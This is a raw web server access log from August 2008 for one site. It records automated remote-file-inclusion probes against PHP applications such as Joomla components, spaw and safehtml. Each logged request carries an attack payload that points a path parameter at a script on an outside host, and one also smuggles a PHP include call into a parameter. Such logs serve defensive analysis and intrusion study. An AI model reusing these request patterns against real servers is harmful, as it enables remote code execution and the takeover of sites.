201.17.129.24 - - [19/Aug/2008:11:15:41 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:11:15:42 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:11:15:44 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:11:15:45 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:17:18 -0700] "GET /logs/access_080806.log//modules/netcat/index.php?DOCUMENT_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:17:18 -0700] "GET //modules/netcat/index.php?DOCUMENT_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:17:18 -0700] "GET /logs//modules/netcat/index.php?DOCUMENT_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.73.189.205 - - [19/Aug/2008:11:17:27 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.73.189.205 - - [19/Aug/2008:11:17:27 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:17:35 -0700] "GET /logs/access_080806.log//modules/netcat/index.php?DOCUMENT_ROOT=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:17:35 -0700] "GET //modules/netcat/index.php?DOCUMENT_ROOT=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:17:35 -0700] "GET /logs//modules/netcat/index.php?DOCUMENT_ROOT=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:17:40 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:17:40 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:17:41 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:11:17:42 -0700] "GET /logs/access_080626.log/phpSecurePages/secure.php?&cfgProgDir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:17:42 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:17:47 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:17:48 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.812" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:17:56 -0700] "GET //lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.245.166.92 - - [19/Aug/2008:11:18:09 -0700] "GET /logs/access_080421.log/config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [19/Aug/2008:11:18:09 -0700] "GET /config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [19/Aug/2008:11:18:09 -0700] "GET /logs/config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [19/Aug/2008:11:18:28 -0700] "GET /logs/access_080516.log/config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:11:18:34 -0700] "GET /logs/access_080731.log//?path%5Bdocroot%5D=http://www.saddlebrookhorsecenter.com/Events///////////ws/gabungan.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:18:53 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:18:53 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:18:54 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:18:54 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.25.192.23 - - [19/Aug/2008:11:18:59 -0700] "GET /logs/access_080715.log//?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.25.192.23 - - [19/Aug/2008:11:18:59 -0700] "GET /logs/access_080615.log//?custompluginfile[]=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
150.187.25.20 - - [19/Aug/2008:11:19:06 -0700] "GET /logs/access_080725.log//admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [19/Aug/2008:11:19:07 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [19/Aug/2008:11:19:07 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.158.41 - - [19/Aug/2008:11:19:27 -0700] "GET /logs/access_080812.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [19/Aug/2008:11:19:28 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [19/Aug/2008:11:19:28 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:11:19:30 -0700] "GET /logs/access_080713.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:11:19:30 -0700] "GET /logs/access_080606.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.12.15.28 - - [19/Aug/2008:11:19:56 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://fratore.altervista.org/ufficio/tommy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
85.12.15.28 - - [19/Aug/2008:11:19:56 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://fratore.altervista.org/ufficio/tommy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.19.158.41 - - [19/Aug/2008:11:19:59 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [19/Aug/2008:11:19:59 -0700] "GET /logs/config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [19/Aug/2008:11:20:00 -0700] "GET /config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.64.112.75 - - [19/Aug/2008:11:20:16 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.64.112.75 - - [19/Aug/2008:11:20:17 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 200 10038 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:11:21:13 -0700] "GET /logs/access_080720.log/contenido.php?sec=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:11:21:13 -0700] "GET /contenido.php?sec=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:11:21:13 -0700] "GET /logs/contenido.php?sec=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:11:21:13 -0700] "GET /logs/access_080727.log/contenido.php?sec=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:11:21:15 -0700] "GET /logs/access_080219.log/main.php?site=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:11:21:15 -0700] "GET /main.php?site=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:11:21:15 -0700] "GET /logs/main.php?site=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
150.187.25.20 - - [19/Aug/2008:11:21:18 -0700] "GET /logs/access_080717.log//admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:11:21:34 -0700] "GET /logs/access_080219.log//?path%5Bdocroot%5D=http://www.saddlebrookhorsecenter.com/Events///////////ws/gabungan.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.111.146 - - [19/Aug/2008:11:21:42 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.111.146 - - [19/Aug/2008:11:21:42 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.111.146 - - [19/Aug/2008:11:21:43 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:11:21:51 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:11:21:52 -0700] "GET /logs/access_080728.log/plugins/safehtml/safehtml.php?dir[plugins]=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:11:21:52 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:11:21:52 -0700] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.6.7 - - [19/Aug/2008:11:22:24 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.borsaimmobiliare.net/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [19/Aug/2008:11:22:24 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.borsaimmobiliare.net/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [19/Aug/2008:11:22:31 -0700] "GET /logs/access_080724.log//index.php?DOCUMENT_ROOT=http://www.borsaimmobiliare.net/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.73.189.205 - - [19/Aug/2008:11:22:34 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.73.189.205 - - [19/Aug/2008:11:22:34 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 200 10038 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
67.19.111.146 - - [19/Aug/2008:11:22:51 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:11:24:39 -0700] "GET /logs/access_080404.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:11:24:40 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:11:24:40 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:11:24:43 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:11:24:44 -0700] "GET /logs/access_080526.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://idar.no-ip.org/sanmateo/images/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:11:24:57 -0700] "GET /logs/access_080724.log//include/lib.inc.php?site_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:11:24:58 -0700] "GET //include/lib.inc.php?site_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:11:24:58 -0700] "GET /logs//include/lib.inc.php?site_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.176.60 - - [19/Aug/2008:11:25:10 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:25:14 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:25:15 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:25:15 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:25:15 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [19/Aug/2008:11:25:17 -0700] "GET /logs/access_080615.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [19/Aug/2008:11:25:18 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [19/Aug/2008:11:25:18 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:11:25:24 -0700] "GET /logs/access_080530.log//modules/xfsection/modify.php?dir_module=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:11:25:31 -0700] "GET /logs/access_080601.log//modules/xfsection/modify.php?dir_module=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [19/Aug/2008:11:25:51 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [19/Aug/2008:11:25:52 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.34.172 - - [19/Aug/2008:11:25:56 -0700] "GET /logs/index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://willsponsor.org/.cgi/psy-bnc??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
69.64.34.172 - - [19/Aug/2008:11:25:57 -0700] "GET /index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://willsponsor.org/.cgi/psy-bnc??? HTTP/1.1" 200 9930 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:26:06 -0700] "GET /logs/access_080127.log//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:26:06 -0700] "GET //mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:26:25 -0700] "GET /logs/access_080114.log//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:26:27 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:26:27 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:26:27 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:26:28 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:26:28 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:26:28 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:26:29 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:26:51 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:11:27:02 -0700] "GET /logs/access_080724.log/plugins/safehtml/safehtml.php?dir[plugins]=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.173.36 - - [19/Aug/2008:11:27:20 -0700] "GET /logs/access_080315.log//samPHPweb/recentlyadded.php/db.php?commonpath=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.173.36 - - [19/Aug/2008:11:27:20 -0700] "GET /logs//samPHPweb/recentlyadded.php/db.php?commonpath=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.173.36 - - [19/Aug/2008:11:27:20 -0700] "GET //samPHPweb/recentlyadded.php/db.php?commonpath=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:27:30 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:27:30 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:27:30 -0700] "GET //skin/zero_vote/error.php?dir=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:27:30 -0700] "GET //skin/zero_vote/error.php?dir=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.173.36 - - [19/Aug/2008:11:27:35 -0700] "GET /logs/access_080601.log//samPHPweb/recentlyadded.php/db.php?commonpath=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:11:27:43 -0700] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:11:27:43 -0700] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:11:27:43 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
